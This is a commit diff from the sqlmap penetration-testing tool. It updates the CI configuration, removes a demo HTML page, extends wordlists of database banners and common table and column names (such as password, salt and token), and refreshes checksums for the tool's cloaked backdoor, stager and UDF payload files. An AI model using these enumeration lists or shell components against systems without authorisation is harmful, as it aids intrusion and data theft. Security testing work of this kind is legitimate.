Minor refresh of cloaked files

Co-authored-by: soffensive <soffensive>

.github/workflows/tests.yml

@@ -9,20 +9,30 @@ jobs:
     runs-on: ${{ matrix.os }}
     strategy:
       matrix:
-        os: [ubuntu-latest, macos-latest, windows-latest]
+        include:
-        python-version: [ 'pypy-2.7', '3.13' ]
+          - os: ubuntu-latest
-        exclude:
+            python-version: "pypy-2.7"
           - os: macos-latest
-            python-version: 'pypy-2.7'
+            python-version: "3.8"
+          - os: windows-latest
+            python-version: "3.14"
+
     steps:
-      - uses: actions/checkout@v2
+      - name: Checkout code
-      - name: Set up Python
+        uses: actions/checkout@v4
-        uses: actions/setup-python@v2
+        with:
+          fetch-depth: 1
+
+      - name: Set up Python ${{ matrix.python-version }}
+        uses: actions/setup-python@v5
         with:
           python-version: ${{ matrix.python-version }}
+
       - name: Basic import test
         run: python -c "import sqlmap; import sqlmapapi"
+
       - name: Smoke test
         run: python sqlmap.py --smoke
+
       - name: Vuln test
         run: python sqlmap.py --vuln

data/html/index.html

@@ -1,151 +0,0 @@
-<!DOCTYPE html>
-
-<!-- https://angrytools.com/bootstrap/editor/ -->
-
-<html lang="en">
-<head>
-    <title>DEMO</title>
-    <meta charset="utf-8">
-    <meta http-equiv="X-UA-Compatible" content="IE=edge">
-    <meta name="viewport" content="width=device-width, initial-scale=1">
-    <link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.0/css/bootstrap.min.css" rel="stylesheet">
-    <link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.0/css/bootstrap-theme.min.css" rel="stylesheet">
-
-    <!--[if lt IE 9]><script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script><script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script><![endif]-->
-</head>
-<body>
-    <style>
-  #wrapper { width: 100%; }
-
-  #page-wrapper {
-    padding: 0 15px;
-    min-height: 568px;
-    background-color: #fff;
-  }
-
-  @media(min-width:768px) {
-    #page-wrapper {
-      position: inherit;
-      margin: 0 0 0 250px;
-      padding: 0 30px;
-      border-left: 1px solid #e7e7e7;
-    }
-  }
-
-  .sidebar .sidebar-nav.navbar-collapse { padding-right: 0; padding-left: 0; }
-  .sidebar .sidebar-search { padding: 15px; }
-  .sidebar ul li { border-bottom: 1px solid #e7e7e7; }
-
-  .sidebar ul li a.active { background-color: #eee; }
-
-  .sidebar .arrow { float: right;}
-  .sidebar .fa.arrow:before { content: "f104";}
-  .sidebar .active>a>.fa.arrow:before { content: "f107"; }
-  .sidebar .nav-second-level li,
-  .sidebar .nav-third-level li {
-    border-bottom: 0!important;
-  }
-
-  .sidebar .nav-second-level li a { padding-left: 37px; }
-  .sidebar .nav-third-level li a { padding-left: 52px; }
-
-  @media(min-width:768px) {
-    .sidebar {
-      z-index: 1;
-      position: absolute;
-      width: 250px;
-      margin-top: 51px;
-    }
-  }
-</style>
-<div id="wrapper">
-
-  <nav class="navbar navbar-default navbar-static-top" role="navigation" style="margin-bottom: 0">
-    <div class="navbar-header">
-      <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
-        <span class="sr-only">Toggle navigation</span>
-        <span class="icon-bar"></span>
-        <span class="icon-bar"></span>
-        <span class="icon-bar"></span>
-      </button>
-      <a class="navbar-brand" href="index.html">sqlmap</a>
-    </div>
-
-    <div class="navbar-default sidebar" role="navigation">
-      <div class="sidebar-nav navbar-collapse">
-        <ul class="nav" id="side-menu">
-          <li>
-            <a href="#"><em class="glyphicon glyphicon-home"></em> Options<span class="arrow"></span></a>
-            <ul class="nav nav-second-level">
-              <li><a>Target</a></li>
-              <li><a>Request</a></li>
-              <li><a>Optimization</a></li>
-              <li><a>Injection</a></li>
-              <li><a>Detection</a></li>
-              <li><a>Techniques</a></li>
-              <li><a>Fingerprint</a></li>
-              <li><a>Enumeration</a></li>
-              <li><a>Brute force</a></li>
-              <li><a>User-defined function injection</a></li>
-              <li><a>File system access</a></li>
-              <li><a>Operating system access</a></li>
-              <li><a>Windows registry access</a></li>
-              <li><a>General</a></li>
-              <li><a>Miscellaneous</a></li>
-            </ul>
-          </li>
-        </ul>
-      </div>
-    </div>
-  </nav>
-
-  <div id="page-wrapper">
-    <div class="row">
-      <h4>DEMO</h4>
-    </div>
-  </div>
-</div>
-<script>
-  /*
- * metismenu - v1.0.3
- * Easy menu jQuery plugin for Twitter Bootstrap 3
- * https://github.com/onokumus/metisMenu
- *
- * Made by Osman Nuri Okumuş
- * Under MIT License
-*/
-  !function(a,b,c){function d(b,c){this.element=b,this.settings=a.extend({},f,c),this._defaults=f,this._name=e,this.init()}var e="metisMenu",f={toggle:!0};d.prototype={init:function(){var b=a(this.element),c=this.settings.toggle;this.isIE()<=9?(b.find("li.active").has("ul").children("ul").collapse("show"),b.find("li").not(".active").has("ul").children("ul").collapse("hide")):(b.find("li.active").has("ul").children("ul").addClass("collapse in"),b.find("li").not(".active").has("ul").children("ul").addClass("collapse")),b.find("li").has("ul").children("a").on("click",function(b){b.preventDefault(),a(this).parent("li").toggleClass("active").children("ul").collapse("toggle"),c&&a(this).parent("li").siblings().removeClass("active").children("ul.in").collapse("hide")})},isIE:function(){for(var a,b=3,d=c.createElement("div"),e=d.getElementsByTagName("i");d.innerHTML="<!--[if gt IE "+ ++b+"]><i></i><![endif]-->",e[0];)return b>4?b:a}},a.fn[e]=function(b){return this.each(function(){a.data(this,"plugin_"+e)||a.data(this,"plugin_"+e,new d(this,b))})}}(jQuery,window,document);
-
-  $(function() {
-
-    $('#side-menu').metisMenu();
-
-  });
-
-  //Loads the correct sidebar on window load,
-  //collapses the sidebar on window resize.
-  // Sets the min-height of #page-wrapper to window size
-  $(function() {
-    $(window).bind("load resize", function() {
-      topOffset = 50;
-      width = (this.window.innerWidth > 0) ? this.window.innerWidth : this.screen.width;
-      if (width < 768) {
-        $('div.navbar-collapse').addClass('collapse')
-        topOffset = 100; // 2-row-menu
-      } else {
-        $('div.navbar-collapse').removeClass('collapse')
-      }
-
-      height = (this.window.innerHeight > 0) ? this.window.innerHeight : this.screen.height;
-      height = height - topOffset;
-      if (height < 1) height = 1;
-      if (height > topOffset) {
-        $("#page-wrapper").css("min-height", (height) + "px");
-      }
-    })
-  });
-</script>
-    <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script>
-    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.0/js/bootstrap.min.js"></script>
-</body>
-</html>

data/txt/common-outputs.txt

@@ -15,6 +15,14 @@
 5.7.
 6.0.
 8.0.
+8.1.
+8.2.
+8.3.
+8.4.
+9.0.
+9.1.
+9.2.
+9.3.
 
 # PostgreSQL
 PostgreSQL 7.0
@@ -39,6 +47,10 @@ PostgreSQL 10.
 PostgreSQL 11.
 PostgreSQL 12.
 PostgreSQL 13.
+PostgreSQL 14.
+PostgreSQL 15.
+PostgreSQL 16.
+PostgreSQL 17.
 
 # Oracle
 Oracle Database 9i Standard Edition Release
@@ -59,6 +71,11 @@ Oracle Database 11g Express Edition Release 11.
 Oracle Database 11g Enterprise Edition Release
 Oracle Database 11g Enterprise Edition Release 11.
 Oracle Database 12c
+Oracle Database 18c
+Oracle Database 19c
+Oracle Database 21c
+Oracle Database 23ai
+Oracle Database 26ai
 
 # Microsoft SQL Server
 Microsoft SQL Server 7.0
@@ -70,6 +87,8 @@ Microsoft SQL Server 2014
 Microsoft SQL Server 2016
 Microsoft SQL Server 2017
 Microsoft SQL Server 2019
+Microsoft SQL Server 2022
+Microsoft SQL Server 2025
 
 
 [Users]
@@ -420,6 +439,10 @@ ReportServer
 ReportServerTempDB
 tempdb
 
+# Cloud Defaults
+rdsadmin
+innodb
+azure_maintenance
 
 [Tables]
 
@@ -1095,6 +1118,29 @@ vVendor
 WorkOrder
 WorkOrderRouting
 
+# Common tables
+
+accounts
+admin
+audit
+backup
+config
+configuration
+customers
+data
+files
+history
+images
+log
+logs
+members
+messages
+orders
+products
+settings
+test
+tokens
+uploads
 
 [Columns]
 
@@ -1236,20 +1282,51 @@ text
 time
 timestamp
 
-# common columns
+# Common columns
+active
+address
+admin
+blocked
+category_id
+city
+confirmed
+country
 created_at
-updated_at
-deleted_at
 created_on
-modified_on
+customer_id
-timestamp
+deleted
+deleted_at
+dob
+email
+enabled
+first_name
+flag
+gender
+hidden
 is_active
 is_deleted
 is_published
-status
+last_name
-enabled
+locked
-user_id
+login
-product_id
+modified_on
-category_id
+name
 order_id
-customer_id
+password
+phone
+private
+product_id
+public
+role
+salt
+state
+status
+timestamp
+token
+type
+updated_at
+user_id
+username
+visible
+zip
+zip_code

data/txt/sha256sums.txt

@@ -1,4 +1,3 @@
-39a8a35d730f49daf657fa58903a9cd309813b275df29a86439297a10a15261a  data/html/index.html
 e70317eb90f7d649e4320e59b2791b8eb5810c8cad8bc0c49d917eac966b0f18  data/procs/mssqlserver/activate_sp_oacreate.sql
 6a2de9f090c06bd77824e15ac01d2dc11637290cf9a5d60c00bf5f42ac6f7120  data/procs/mssqlserver/configure_openrowset.sql
 798f74471b19be1e6b1688846631b2e397c1a923ad8eca923c1ac93fc94739ad  data/procs/mssqlserver/configure_xp_cmdshell.sql
@@ -13,58 +12,58 @@ afb169095dc36176ffdd4efab9e6bb9ed905874469aac81e0ba265bc6652caa4  data/procs/mss
 606fe26228598128c88bda035986281f117879ac7ff5833d88e293c156adc117  data/procs/oracle/read_file_export_extension.sql
 4d448d4b7d8bc60ab2eeedfe16f7aa70c60d73aa6820d647815d02a65b1af9eb  data/procs/postgresql/dns_request.sql
 7e3e28eac7f9ef0dea0a6a4cdb1ce9c41f28dd2ee0127008adbfa088d40ef137  data/procs/README.txt
-519431a555205974e7b12b5ecb8d6fb03a504fbb4a6a410db8874a9bfcff6890  data/shell/backdoors/backdoor.asp_
+3ba14fdeac54b552860f6d1d73e7dc38dfcde6ef184591b135687d9c21d7c8cd  data/shell/backdoors/backdoor.asp_
-fbb0e5456bc80923d0403644371167948cefc8e95c95a98dc845bc6355e3718f  data/shell/backdoors/backdoor.aspx_
+35197e3786008b389adf3ecb46e72a5d6f9c7f00a8c9174bf362a4e4d32e594c  data/shell/backdoors/backdoor.aspx_
-01695090da88b7e71172e3b97293196041e452bbb7b2ba9975b4fac7231e00a5  data/shell/backdoors/backdoor.cfm_
+081680b403d0d02b6b1c49d67a5372b95c2a345038c4e2b9ac446af8b4af2cc8  data/shell/backdoors/backdoor.cfm_
-03117933dcc9bfc24098e1e0191195fc4bafb891f0752edee28be1741894e0e5  data/shell/backdoors/backdoor.jsp_
+f240c9ba18caaf353e3c41340f36e880ed16385cad4937729e59a4fd4e3fa40a  data/shell/backdoors/backdoor.jsp_
-2505011f6dcf4c1725840ce495c3b3e4172217286f5ce2a0819c7a64ce35d9df  data/shell/backdoors/backdoor.php_
+78b8b00aeaf9fddc5c62832563f3edda18ec0f6429075e7d89d06fce9ddcf8c2  data/shell/backdoors/backdoor.php_
 a08e09c1020eae40b71650c9b0ac3c3842166db639fdcfc149310fc8cf536f64  data/shell/README.txt
-a4d49b7c1b43486d21f7d0025174b45e0608f55c110c6e9af8148478daec73d1  data/shell/stagers/stager.asp_
+a65269dcf3cecd4be0bf6b657cbf49ac77814ac7b0e30afa1cd44bc2fed64c33  data/shell/stagers/stager.asp_
-1b21206f9d35b829fdf9afa17ea5873cd095558f05e644d56b39d560dfa62b6e  data/shell/stagers/stager.aspx_
+8f625fdc513258ee26b3cae257be7114c9f114acb1e93172e2a8f5d2e8e0e0db  data/shell/stagers/stager.aspx_
-8a149f77137fc427e397ec2c050e4028d45874234bc40a611a00403799e2dc0b  data/shell/stagers/stager.cfm_
+c52c17f3344707cae4c3694a979e073202bd46866fcc51d99f7e4d0c21cf335b  data/shell/stagers/stager.cfm_
-c3a595fc1746ee07dbc0592ba7d5e207e6110954980599f63b8156d1d277f8ca  data/shell/stagers/stager.jsp_
+8cb4a001efc15bd8022d44df6eb9b2f5f5af1c64caba8f7dffde563ccba76347  data/shell/stagers/stager.jsp_
-82bcebc46ed3218218665794197625c668598eb7e861dd96e4f731a27b18a701  data/shell/stagers/stager.php_
+af4e1f87ec7afd12b7ddb39ff07bf24cd31be2b1de11e1be064e1dd96ff43eac  data/shell/stagers/stager.php_
 eb86f6ad21e597f9283bb4360129ebc717bc8f063d7ab2298f31118275790484  data/txt/common-columns.txt
 63ba15f2ba3df6e55600a2749752c82039add43ed61129febd9221eb1115f240  data/txt/common-files.txt
-5ead09a8e46b0043fae0ae35fbe1e67b284002e715b65eb26080d91e8b100d19  data/txt/common-outputs.txt
+9610fbd4ede776ab60d003c0ea052d68625921a53cdcfa50a4965b0985b619ca  data/txt/common-outputs.txt
 44047281263ef297f27fdd8fa98a0b0438a25989f897ce184cb0e2e442fb6c11  data/txt/common-tables.txt
 ccba96624a0176b4c5acd8824db62a8c6856dafa7d32424807f38efed22a6c29  data/txt/keywords.txt
 522cce0327de8a5dfb5ade505e8a23bbd37bcabcbb2993f4f787ccdecf24997e  data/txt/smalldict.txt
 6c07785ff36482ce798c48cc30ce6954855aadbe3bfac9f132207801a82e2473  data/txt/user-agents.txt
 9c2d6a0e96176447ab8758f8de96e6a681aa0c074cd0eca497712246d8f410c6  data/txt/wordlist.tx_
-e3007876d35a153d9a107955fad3f6c338d3733210317b1f359417e8297595aa  data/udf/mysql/linux/32/lib_mysqludf_sys.so_
+0a1f612740c5cf7cd58de8aadd5b758c887cf8465e629787e29234d7d0777514  data/udf/mysql/linux/32/lib_mysqludf_sys.so_
-77f7e7b6cfde4bae8d265f81792c04c4d2b2966328cbf8affb4f980dec2b9d91  data/udf/mysql/linux/64/lib_mysqludf_sys.so_
+6944a6f7b4137ef5c4dedff23102af2bd199097fc8c33aeea3891f8cff25e002  data/udf/mysql/linux/64/lib_mysqludf_sys.so_
-52b41ab911f940c22b7490f1d80f920c861e7a6c8c25bb8d3a765fd8af0c34a0  data/udf/mysql/windows/32/lib_mysqludf_sys.dll_
+4ceb22cb3ae14b44d68b56b147e1bd61a70cb424a3e95b6d010330f47e0fb5d0  data/udf/mysql/windows/32/lib_mysqludf_sys.dll_
-ea6592dbe61e61f52fd6ab7082722733197fa8f3e6bec0a99ca25aff47c15cff  data/udf/mysql/windows/64/lib_mysqludf_sys.dll_
+4cc318f2574366686220b78ce905e52ae821526b0228beea538063f552813282  data/udf/mysql/windows/64/lib_mysqludf_sys.dll_
-c58dd9b9fa27df0a730802bd49e36a5a3ccd59611fc1c61b8e85f92e14ac2a88  data/udf/postgresql/linux/32/10/lib_postgresqludf_sys.so_
+dc6ac20faf8d738673de1b42399d23be1c4006238a863e0aec96d1b84c7120de  data/udf/postgresql/linux/32/10/lib_postgresqludf_sys.so_
-b6fdcfcafbbc5da34359604a69aaa9f8459a7e6e319f7b2ee128e762e84d1643  data/udf/postgresql/linux/32/11/lib_postgresqludf_sys.so_
+5f062f5949803b9457ab1f4c138f2a97004944fdd3adf59954070b36863024fa  data/udf/postgresql/linux/32/11/lib_postgresqludf_sys.so_
-8d22d8b06ce253ae711c6a71b4ed98c7ad5ad1001a3dafb30802ec0b9b325013  data/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_
+3b3b46ccbf3c588ebaf90bf070eb1049fcf683918d54260c12b3d682916a155b  data/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_
-812374d50a672a9d07faba1be9a13cfb84a369894dc7c702991382bb9558be9d  data/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_
+d662e025c2680a4b463fe7c0baad16582f0700800140d5cfcdddbabc5287f720  data/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_
-5b816a33d9c284e62f1ea707e07b10be5efd99db5762d7bd60c6360dd2e70d8f  data/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_
+e8050613548293ef500277713a4aa9aa5ca1a9f5f1fef3120a04dc1ae1440937  data/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_
-cf5b9986fd70f6334bd00e8efcf022571089b8384b650245fb352ec18e48acdf  data/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_
+585a29538fdcdb43994d6b2273447287695676855a80b74fc84d76a228cf86c5  data/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_
-445c05dac6714a64777892a372b0e3c93eee651162a402658485c48439390ad2  data/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_
+956c17e6ef74ac4f4d423e9060f9fd5fb6aaa885dcda75f3180edfbb6e5debe5  data/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_
-1c86d2358c20384ac92d333444b955a01ee97f28caac35ed39fdb654d5f93c1b  data/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_
+619ae8bcce96042c4777250bccf9db41ee7131a7b610e79385116bce146704e2  data/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_
-050ff4692a04dc00b7e6ac187a56be47b5a654ccf907ffa9f9446194763ae7e5  data/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_
+7c8359639ecbc57cf9278e22cc177073c69999826ba940aa2ce86fc829d27ab8  data/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_
-7806d4c6865c7ebed677ae8abe302ca687c8f9f5b5287b89fed27a36beeeb232  data/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_
+2e77400e71c964f3d2491dbddeb92eef6c9e2fcc8db57d58e10b95976dc54524  data/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_
-cfa2a8fc26430cbc11ad0bd37609c753d4ca1eecb0472efe3518185d2d13e7cf  data/udf/postgresql/linux/32/9.5/lib_postgresqludf_sys.so_
+b4e5c86ba5c9ad668d822944fe8bfd59664cc8a6c3a6e5fb6cf2ce1fe7cb04a9  data/udf/postgresql/linux/32/9.5/lib_postgresqludf_sys.so_
-d2210ad9260bd22017acc519a576595306842240f24d8b4899a23228a70f78c6  data/udf/postgresql/linux/32/9.6/lib_postgresqludf_sys.so_
+c58117a9c5569bbf74170a5cd93d7c878b260c813515694e42d25b6d38bbeb79  data/udf/postgresql/linux/32/9.6/lib_postgresqludf_sys.so_
-6311d919f6ff42c959d0ce3bc6dd5cb782f79f77857e9ab3bd88c2c365e5f303  data/udf/postgresql/linux/64/10/lib_postgresqludf_sys.so_
+ffb54c96f422b1e833152b7134adff65418e155e1d3a798e9325cf53daadd308  data/udf/postgresql/linux/64/10/lib_postgresqludf_sys.so_
-4520fc47ea6e0136e03ba9b2eb94161da328f340bf6fbebad39ca82b3b3e323b  data/udf/postgresql/linux/64/11/lib_postgresqludf_sys.so_
+b907f950f8485d661b4a2c8cb53fbc4d25606275ef36e33929fd4772cfa8925d  data/udf/postgresql/linux/64/11/lib_postgresqludf_sys.so_
-bad0bb94ec75b2912d8028f7afdfd70a96c8f86cbc10040c72ece3fd5244660d  data/udf/postgresql/linux/64/12/lib_postgresqludf_sys.so_
+f9015f9b1c4d8ffe0bf806718e31d36b32108544a3b99fda6a8c44ebfdcca0ff  data/udf/postgresql/linux/64/12/lib_postgresqludf_sys.so_
-b8132a5fe67819ec04dbe4e895addf7e9f111cfe4810a0c94b68002fd48b5deb  data/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_
+869d9df6b8bee8f801fabfda5ca242bd3514c1c9a666c28c52770ffe6eaf7afc  data/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_
-03f3b12359a1554705eab46fb04dba63086beb5e2b20f97b108164603efdcb65  data/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_
+4e53979687166cc26a320069f9cdfe09535f348088fc76810314a6cf41e13d12  data/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_
-e5be1341a84b1a14c4c648feec02418acb904cd96d7cf0f66ec3ff0c117baf91  data/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_
+bd8ae1dd0c61634615cd26dd9765e24b8c63302cf0663fbb4b516b4cbde5457e  data/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_
-28113b48848ba7d22955a060a989f5ae4f14183b1fc64b67898095610176098c  data/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_
+8ce6f5d9b6821e57d516a07255cf5db544ee683db24ee231e5ce8c152baf0a69  data/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_
-1187045f66f101c89678791960dc37ca5663cf4190ca7dc550753f028ec61a88  data/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_
+6b0c4996ade6d1e667d52037d6687548a442d9c6fc1e4c31e0ba3b2248474b1f  data/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_
-2259cd7e3f6ff057bbbb6766efc6818a59dbf262bfadefd9fda31746903c7501  data/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_
+d3e0238e9c83b88061b1613db5c9faed5f03a16f6ecf34c52d5ff9ac960107d0  data/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_
-1fdb0856443b56bf9e3e8c7d195171327217af745ad2e299c475d96892a07ec9  data/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_
+102986c0524cab385c95deba4efed4ad7e3479ef2770cc7256571958b9325b4f  data/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_
-21e274e6c49cc444d689cb34a83497f982ed2b2850cab677dc059aea9e397870  data/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_
+031b5ca9e9ff47435821d04abbe0716e464785dd57e58439ff9dc552144f4e59  data/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_
-6707132e4e812ad23cc22ff26e411e89f1eb8379a768161b410202c5442ff3ea  data/udf/postgresql/linux/64/9.5/lib_postgresqludf_sys.so_
+dc1e3542e639ffa2b63972d34fc2529054ec163560c1f28c1719413759f94616  data/udf/postgresql/linux/64/9.5/lib_postgresqludf_sys.so_
-0989c0c0143fb515a12a8b5064f014c633d13a8841aeceaf02ff46901f17805f  data/udf/postgresql/linux/64/9.6/lib_postgresqludf_sys.so_
+07d425be2d24cd480299759c12dd8b1c77707dc9879b1878033c3149185ccf60  data/udf/postgresql/linux/64/9.6/lib_postgresqludf_sys.so_
-3a492e9a1da0799d1107aa5949538303d06409c9a0ed00499626a08083d486ee  data/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_
+c5b9d622aca6da735e7ed9906e28c7e061e97c223ef92ba1a5d5028ecbb16962  data/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_
-3eab7d90606c3c0a9a88e1475e6d8d7d787b3b109c7e188cb9cb8b5561a6766e  data/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_
+807413d852b9d2db33b7f6064699df3328cd4cf9357cac4f7627a0bbb38f6fbf  data/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_
-a1fe84c5b409366c3926f3138189fb17e7388ef09594a47c9d64e4efe9237a4b  data/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_
+8f7f59a6896ae5b39e2afbfe8479a1f2637fb52220cc1e7158921e570d15fb2a  data/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_
-7368a6301369a63e334d829a1d7f6e0b55a824a9f1579dfeb7ced5745994ebc6  data/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_
+7c2511b47ab9d0de1d77f1d775c6522285687ee82fec0edc11cada75ac3f29ae  data/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_
 0a6d5fc399e9958477c8a71f63b7c7884567204253e0d2389a240d83ed83f241  data/udf/README.txt
 288592bbc7115870516865d5a92c2e1d1d54f11a26a86998f8829c13724e2551  data/xml/banner/generic.xml
 2adcdd08d2c11a5a23777b10c132164ed9e856f2a4eca2f75e5e9b6615d26a97  data/xml/banner/mssql.xml
@@ -77,19 +76,19 @@ a1fe84c5b409366c3926f3138189fb17e7388ef09594a47c9d64e4efe9237a4b  data/udf/postg
 a7eb4d1bcbdfd155383dcd35396e2d9dd40c2e89ce9d5a02e63a95a94f0ab4ea  data/xml/banner/sharepoint.xml
 e2febc92f9686eacf17a0054f175917b783cc6638ca570435a5203b03245fc18  data/xml/banner/x-aspnet-version.xml
 3a440fbbf8adffbe6f570978e96657da2750c76043f8e88a2c269fe9a190778c  data/xml/banner/x-powered-by.xml
-1ac399c49ce3cb8c0812bb246e60c8a6718226efe89ccd1f027f49a18dbeb634  data/xml/boundaries.xml
+0223157364ea212de98190e7c6f46f9d2ee20cf3d17916d1af16e857bb5dc575  data/xml/boundaries.xml
-47c444f260fcba24bb1f13e3d4819ed846909f8d2b6e715069d6372ea30f026f  data/xml/errors.xml
+02a7f6d6a0e023c3f087f78ab49cfb99e81df2b42e32718f877d90ab220486dc  data/xml/errors.xml
-cfa1f0557fb71be0631796a4848d17be536e38f94571cf6ef911454fbc6b30d1  data/xml/payloads/boolean_blind.xml
+d0b094a110bccec97d50037cc51445191561c0722ec53bf2cebe1521786e2451  data/xml/payloads/boolean_blind.xml
-f2b711ea18f20239ba9902732631684b61106d4a4271669125a4cf41401b3eaf  data/xml/payloads/error_based.xml
+88b8931a6d19af14e44a82408c250ed89295947575bbf3ff3047da1d37d1a1c1  data/xml/payloads/error_based.xml
 b0f434f64105bd61ab0f6867b3f681b97fa02b4fb809ac538db382d031f0e609  data/xml/payloads/inline_query.xml
 0648264166455010921df1ec431e4c973809f37ef12cbfea75f95029222eb689  data/xml/payloads/stacked_queries.xml
 997556b6170964a64474a2e053abe33cf2cf029fb1acec660d4651cc67a3c7e1  data/xml/payloads/time_blind.xml
 40a4878669f318568097719d07dc906a19b8520bc742be3583321fc1e8176089  data/xml/payloads/union_query.xml
-eeaec8f6590db3315a740b04f21fed8ae229d9d0ef8b85af5ad83a905e9bfd6e  data/xml/queries.xml
+a2a2d3f8bf506f27ab0847ad4daa1fc41ca781dd58b70d2d9ac1360cf8151260  data/xml/queries.xml
-abb6261b1c531ad2ee3ada8184c76bcdc38732558d11a8e519f36fcc95325f7e  doc/AUTHORS
+0f5a9c84cb57809be8759f483c7d05f54847115e715521ac0ecf390c0aa68465  doc/AUTHORS
 ce20a4b452f24a97fde7ec9ed816feee12ac148e1fde5f1722772cc866b12740  doc/CHANGELOG.md
-2df1f15110f74ce4e52f0e7e4a605e6c7e08fbda243e444f9b60e26dfc5cf09d  doc/THANKS.md
+c8d5733111c6d1e387904bc14e98815f98f816f6e73f6a664de24c0f1d331d9b  doc/THANKS.md
-f939c6341e3ab16b0bb9d597e4b13856c7d922be27fd8dba3aa976b347771f16  doc/THIRD-PARTY.md
+d7e38b213c70fe519fff2e06a9fd0dcfb1d8bed7787e37916cd14faaf002e167  doc/THIRD-PARTY.md
 25012296e8484ea04f7d2368ac9bdbcded4e42dbc5e3373d59c2bb3e950be0b8  doc/translations/README-ar-AR.md
 c25f7d7f0cc5e13db71994d2b34ada4965e06c87778f1d6c1a103063d25e2c89  doc/translations/README-bg-BG.md
 e85c82df1a312d93cd282520388c70ecb48bfe8692644fe8dbbf7d43244cda41  doc/translations/README-bn-BD.md
@@ -119,32 +118,32 @@ c4590a37dc1372be29b9ba8674b5e12bcda6ab62c5b2d18dab20bcb73a4ffbeb  doc/translatio
 8c4b528855c2391c91ec1643aeff87cae14246570fd95dac01b3326f505cd26e  extra/beep/beep.py
 509276140d23bfc079a6863e0291c4d0077dea6942658a992cbca7904a43fae9  extra/beep/beep.wav
 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3  extra/beep/__init__.py
-676a764f77109f29c310d7f9424c381516f71944e910efabbc95601af1e49a48  extra/cloak/cloak.py
+b8d919ad6c632a9f5b292ee6c0476e9b092a39c0727fe89d12102d1938217116  extra/cloak/cloak.py
 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3  extra/cloak/__init__.py
 6879b01859b2003fbab79c5188fce298264cd00300f9dcecbe1ffd980fe2e128  extra/cloak/README.txt
 4b6d44258599f306186a24e99d8648d94b04d85c1f2c2a442b15dc26d862b41e  extra/dbgtool/dbgtool.py
 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3  extra/dbgtool/__init__.py
 a777193f683475c63f0dd3916f86c4b473459640c3278ff921432836bc75c47f  extra/dbgtool/README.txt
-b7557edb216f65056d359cd48f3191a642cf3a1838a422a67ffbef17b58535d7  extra/icmpsh/icmpsh.exe_
+6cdf3fff3bdf14f7becf5737f30085fd46510a2baa77c72b026723525b46e41b  extra/icmpsh/icmpsh.exe_
-2fcce0028d9dd0acfaec497599d6445832abad8e397e727967c31c834d04d598  extra/icmpsh/icmpsh-m.c
+4838389bf1ceac806dff075e06c5be9c0637425f37c67053a4361a5f1b88a65c  extra/icmpsh/icmpsh-m.c
 8c38efaaf8974f9d08d9a743a7403eb6ae0a57b536e0d21ccb022f2c55a16016  extra/icmpsh/icmpsh-m.pl
 12014ddddc09c58ef344659c02fd1614157cfb315575378f2c8cb90843222733  extra/icmpsh/icmpsh_m.py
-1589e5edeaf80590d4d0ce1fd12aa176730d5eba3bfd72a9f28d3a1a9353a9db  extra/icmpsh/icmpsh-s.c
+6359bfef76fb5c887bb89c2241f6d65647308856f8d3ce3e10bf3fdde605e120  extra/icmpsh/icmpsh-s.c
 ab6ee3ee9f8600e39faecfdaa11eaa3bed6f15ccef974bb904b96bf95e980c40  extra/icmpsh/__init__.py
 27af6b7ec0f689e148875cb62c3acb4399d3814ba79908220b29e354a8eed4b8  extra/icmpsh/README.txt
 1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3  extra/__init__.py
 191e3e397b83294082022de178f977f2c59fa99c96e5053375f6c16114d6777e  extra/runcmd/README.txt
